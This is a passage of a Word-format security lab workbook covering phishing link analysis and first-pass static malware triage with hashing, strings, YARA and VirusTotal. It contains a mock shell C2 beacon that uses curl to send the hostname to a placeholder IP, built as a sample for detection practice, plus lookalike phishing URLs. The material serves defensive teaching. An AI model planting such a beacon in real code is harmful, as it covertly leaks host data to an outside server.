          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The earliest hop desktop-pc [10.0.0.99] is the actual sender — a residential PC, not PayPal infrastructure.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Check embedded links (CySA+ "Obfuscated links")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Phish emails hide the real destination behind plausible link text. Pull every URL:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; /tmp/body.txt &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Click here to verify: https://paypa1.com.secur1ty-paypal.com/login?u=victim</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>Or: &lt;a href="http://203.0.113.42/p"&gt;https://www.paypal.com&lt;/a&gt;</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grep -Eoi 'https?://[^"&lt;&gt;[:space:]]+' /tmp/body.txt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Inspect for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Lookalike domains (paypa1 with a "1" instead of an "l")</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Anchor-text vs href mismatch (the second link says paypal.com but points to a raw IP)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Punycode (xn--...) — paste suspicious URLs into a punycode decoder</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Validate against a public service</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>For real triage, paste the full header into:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MXToolbox Header Analyzer — https://mxtoolbox.com/EmailHeaders.aspx</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Google Messageheader — https://toolbox.googleapps.com/apps/messageheader/</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Both will visualise the hop chain and parse the SPF/DKIM/DMARC results in seconds.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>What You Learned</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to query SPF, DKIM, and DMARC records with dig.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to read the Authentication-Results header to confirm forgery.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to trace the Received chain to the true sender IP.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>How to spot obfuscated / lookalike links in the email body.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="160"/>
        <w:shd w:val="clear" w:fill="FDF3E7"/>
        <w:ind w:left="144" w:right="144"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="C87A1E"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Test it: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>For real triage, paste the full header into:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Lab 9 — Malware Triage with Hashing and VirusTotal</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perform first-pass static malware triage: identify the file type, hash it, extract printable strings, write a YARA rule, and submit the hash to VirusTotal.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>In this lab you will perform first-pass static malware triage: identify the file type, hash it, extract printable strings, write a YARA rule, and submit the hash to VirusTotal. These are exam-blueprint items under CySA+ 1.3 (File analysis — Hashing, Strings, VirusTotal, Sandboxing).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Run all commands on the Killercoda Ubuntu Playground: https://killercoda.com/playgrounds/scenario/ubuntu</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 Web (VirusTotal)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="80"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="4937760" cy="2934789"/>
            <wp:docPr id="7" name="Picture 7"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="img_e8186f7ac6.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4937760" cy="2934789"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 1 — Install tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>apt update &amp;&amp; apt install -y binutils yara curl file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 2 — Create a benign "suspicious" sample</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>We will not download real malware. Instead, build an obviously fishy binary so the workflow is identical to the real triage process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>mkdir -p /tmp/lab9 &amp;&amp; cd /tmp/lab9</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; sample.sh &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>#!/bin/sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t># C2 beacon</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>URL="http://203.0.113.50/c2/beacon"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>KEY="aXAtbWFsd2FyZS1zZWNyZXQK"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>curl -s -H "X-Key: $KEY" "$URL?id=$(hostname)" &gt;/dev/null</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chmod +x sample.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 3 — Identify the file type</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>file sample.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>file reads the magic bytes — never trust the extension. A renamed .jpg that says PE32 executable is an immediate red flag.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 4 — Hash the sample (chain-of-custody first step)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>md5sum sample.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sha1sum sample.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>sha256sum sample.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Always hash with SHA-256 for evidence; MD5/SHA-1 are still used by AV vendors but are cryptographically weak. Record the hash before doing anything else (Lab 21).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 5 — Extract strings</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>strings -n 6 sample.sh | head -20</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Look for:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>URLs / IPs (C2 endpoints — 203.0.113.50 here)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Base64-encoded blobs</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Suspicious API names (VirtualAllocEx, WriteProcessMemory)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="ListBullet"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:color w:val="161B26"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Compiler artefacts (PDB paths, Go build IDs)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>Extract base64-looking strings:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>strings -n 16 sample.sh | grep -E '^[A-Za-z0-9+/=]{16,}$'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>echo aXAtbWFsd2FyZS1zZWNyZXQK | base64 -d</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 6 — Write a YARA rule</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>YARA rules let you sweep an estate for any file matching the IOCs you just found.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>cat &gt; c2_beacon.yar &lt;&lt;'EOF'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>rule lab9_c2_beacon</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xml:space="preserve">    meta:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        author = "cysa-lab"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        description = "Detects the lab9 C2 beacon"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    strings:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        $url = "203.0.113.50/c2/beacon"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        $key = "X-Key:"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        $cmd = "curl"</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    condition:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        all of them</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yara c2_beacon.yar sample.sh</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="288"/>
        <w:shd w:val="clear" w:fill="F2F4F7"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="0B3060"/>
          <w:sz w:val="18"/>
        </w:rPr>
        <w:t>yara c2_beacon.yar /etc       # sweep, will be quiet</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>The first command should report a match; the second should be silent.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial"/>
        </w:rPr>
        <w:t>Step 7 — Lookup the hash on VirusTotal (free web)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
